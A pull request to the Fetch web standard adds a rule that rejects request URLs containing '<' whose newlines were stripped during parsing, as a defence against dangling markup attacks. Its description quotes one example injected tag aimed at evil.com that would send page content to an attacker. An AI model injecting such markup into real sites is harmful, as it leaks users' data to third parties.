### PR TITLE
Block requests for suspected dangling markup.

### DIFF
--- a/fetch.bs
+++ b/fetch.bs
@@ -2408,6 +2408,10 @@ with a <i>CORS flag</i> and <i>recursive flag</i>, run these steps:
  not <a lt="is local">local</a>, set
  <var>response</var> to a <a>network error</a>.
 
+ <li><p>If |request|'s <a for=request>url</a>'s <a for=url>parser-removed-tab-or-newline flag</a>
+ is set, and |request|'s <a for=request>url</a> <a for=url>path</a> contains a U+003C
+ code point ("<code>&lt;</code>"), then set <var>response</var> to a <a>network error</a>.
+
  <li><p>Execute <a href=https://w3c.github.io/webappsec-csp/#report-for-request>Report Content Security Policy violations for <var>request</var></a>.
  [[!CSP]]
 


### PR DESCRIPTION
As a mitigation against dangling markup attacks (which inject open tags like
`<img src='https://evil.com/` that eat up subsequent markup, and exfiltrate
content to an attacker), this patch tightens request processing to reject
those that contain a `<` character (consistent with an HTML element), _and_
had newline characters stripped during URL parsing (see whatwg/url#284).

It might be possible to URLs whose newline characters were stripped entirely,
based on initial metrics. If those pan out the way I hope, we can tighten
this up in the future.